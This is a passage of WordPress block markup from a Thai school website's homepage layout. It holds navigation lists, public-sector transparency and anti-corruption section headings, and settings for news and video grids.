kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 